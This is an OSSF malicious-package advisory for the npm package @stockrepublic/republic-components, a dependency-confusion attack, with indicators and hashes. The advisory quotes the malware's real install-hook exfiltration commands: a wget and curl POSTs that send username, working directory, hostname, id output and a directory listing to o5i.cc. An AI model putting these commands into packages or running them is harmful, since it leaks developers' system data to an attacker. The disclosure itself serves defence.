mal-2026-4289
Vulnerability from ossf_malicious_packages
Published
2026-05-24 19:40
Modified
2026-05-26 05:55
Summary
Malicious code in @stockrepublic/republic-components (npm)
Details
-= Per source details. Do not edit below this line.=-
Source: amazon-inspector (300b309644b646817c47a283d8b9aaa018e8ae0f59986207f55fd0c39dca872a)
The package masquerades as an internal @stockrepublic component (version 99.0.0, description 'Runs git diff and saves the output to git.log on install') but performs no git operation. Two independent install-time exfiltration paths fire on npm install:
- package.json
preinstallrunswget --quiet "http://o5i.cc/supp?user=$(whoami)&path=$(pwd)&hostname=$(hostname)", leaking the installer's username, working directory, and hostname over plain HTTP to o5i.cc. - package.json
installrunsnode index.js, which at index.js line 11 invokesexecSync("id > log.txt; ls -la >> log.txt; hostname >> log.txt; curl -X POST -F file=@log.txt https://o5i.cc/supp; curl -X POST -d \"$(id)\" https://o5i.cc/supp"), exfiltrating uid/gid output and a directory listing of the consumer's project.
The inflated 99.0.0 version in a scoped namespace, combined with a cover-story description that does not match the code, is the canonical dependency-confusion pattern targeting an organization's private @stockrepublic registry. Any developer or CI system that pulls this public package by mistake leaks identity and filesystem metadata to attacker infrastructure.
Source: ossf-package-analysis (f5dd919316a540368ded0f9b3b7dc25a4f937373069ad4dfe1262c3b48f2949c)
The OpenSSF Package Analysis project identified '@stockrepublic/republic-components' @ 99.0.0 (npm) as malicious.
It is considered malicious because:
- The package executes one or more commands associated with malicious behavior.
CWE
{
"affected": [
{
"database_specific": {
"cwes": [
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
}
],
"indicators": {
"domains": [
"o5i.cc"
],
"evidence_files": [
{
"path": "package.json",
"sha256": "d02146874e017458cfdec8f2cf0752a2e84853c9c64e8edd791b49349a069893",
"tlsh": "03f0a2f89a32df232dc11f7134f18147f481bae75455ac28ddb76904c3ce881247a759"
},
{
"path": "index.js",
"sha256": "dc4af3b8f0aa13c77049bdbb6d7144fd115355d874c5788e5a5d7dc035167d89",
"tlsh": "cb0152a3435d977492e20cd47a6f602fbd8bf3963106f9b04a7c48698bc285c40630e6"
}
],
"package_integrity": [
{
"filename": "republic-components-99.0.0.tgz",
"hashes": {
"sha1": "5b1da5c3606e5c6712cb29883dd2008c5ff189f2",
"sha512_sri": "sha512-nDALP/7uK3Cx3uvvjUctJ+v7U/YHJQiNveN4jUhcMO59usO3f+dY0F5AsRZR1LG4v98ayKebrGIE2iEO/FBMgw=="
}
}
]
}
},
"package": {
"ecosystem": "npm",
"name": "@stockrepublic/republic-components"
},
"versions": [
"99.0.0",
"100.0.0"
]
}
],
"credits": [
{
"contact": [
"actran@amazon.com"
],
"name": "Amazon Inspector",
"type": "FINDER"
},
{
"contact": [
"https://github.com/ossf/package-analysis",
"https://openssf.slack.com/channels/package_analysis"
],
"name": "OpenSSF: Package Analysis",
"type": "FINDER"
}
],
"database_specific": {
"malicious-packages-origins": [
{
"import_time": "2026-05-24T21:49:24.852151634Z",
"modified_time": "2026-05-24T19:53:13Z",
"sha256": "f5dd919316a540368ded0f9b3b7dc25a4f937373069ad4dfe1262c3b48f2949c",
"source": "ossf-package-analysis",
"versions": [
"99.0.0"
]
},
{
"id": "IN-MAL-2026-004539",
"import_time": "2026-05-26T05:52:48.062718972Z",
"modified_time": "2026-05-24T19:40:37Z",
"sha256": "300b309644b646817c47a283d8b9aaa018e8ae0f59986207f55fd0c39dca872a",
"source": "amazon-inspector",
"versions": [
"99.0.0"
]
},
{
"id": "IN-MAL-2026-004540",
"import_time": "2026-05-26T05:52:48.178141461Z",
"modified_time": "2026-05-24T19:57:36Z",
"sha256": "cccc2f3457a8267127a9715173a83640bd4e301797fc5d4e0345f91bf924e4ac",
"source": "amazon-inspector",
"versions": [
"100.0.0"
]
},
{
"id": "IN-MAL-2026-004541",
"import_time": "2026-05-26T05:52:48.269952239Z",
"modified_time": "2026-05-24T19:57:36Z",
"sha256": "eea914c1229cc6bbc788730857e871dae1f161a0b0e1dece234e336252bd1155",
"source": "amazon-inspector",
"versions": [
"100.0.0"
]
}
]
},
"details": "\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (300b309644b646817c47a283d8b9aaa018e8ae0f59986207f55fd0c39dca872a)\nThe package masquerades as an internal @stockrepublic component (version 99.0.0, description \u0027Runs git diff and saves the output to git.log on install\u0027) but performs no git operation. Two independent install-time exfiltration paths fire on `npm install`:\n\n1. package.json `preinstall` runs `wget --quiet \"http://o5i.cc/supp?user=$(whoami)\u0026path=$(pwd)\u0026hostname=$(hostname)\"`, leaking the installer\u0027s username, working directory, and hostname over plain HTTP to o5i.cc.\n2. package.json `install` runs `node index.js`, which at index.js line 11 invokes `execSync(\"id \u003e log.txt; ls -la \u003e\u003e log.txt; hostname \u003e\u003e log.txt; curl -X POST -F file=@log.txt https://o5i.cc/supp; curl -X POST -d \\\"$(id)\\\" https://o5i.cc/supp\")`, exfiltrating uid/gid output and a directory listing of the consumer\u0027s project.\n\nThe inflated 99.0.0 version in a scoped namespace, combined with a cover-story description that does not match the code, is the canonical dependency-confusion pattern targeting an organization\u0027s private @stockrepublic registry. Any developer or CI system that pulls this public package by mistake leaks identity and filesystem metadata to attacker infrastructure.\n\n## Source: ossf-package-analysis (f5dd919316a540368ded0f9b3b7dc25a4f937373069ad4dfe1262c3b48f2949c)\nThe OpenSSF Package Analysis project identified \u0027@stockrepublic/republic-components\u0027 @ 99.0.0 (npm) as malicious.\n\nIt is considered malicious because:\n\n- The package executes one or more commands associated with malicious behavior.\n",
"id": "MAL-2026-4289",
"modified": "2026-05-26T05:55:01Z",
"published": "2026-05-24T19:40:37Z",
"references": [
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/@stockrepublic/republic-components/v/99.0.0"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/@stockrepublic/republic-components/v/100.0.0"
}
],
"schema_version": "1.7.4",
"summary": "Malicious code in @stockrepublic/republic-components (npm)"
}
Loading…
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…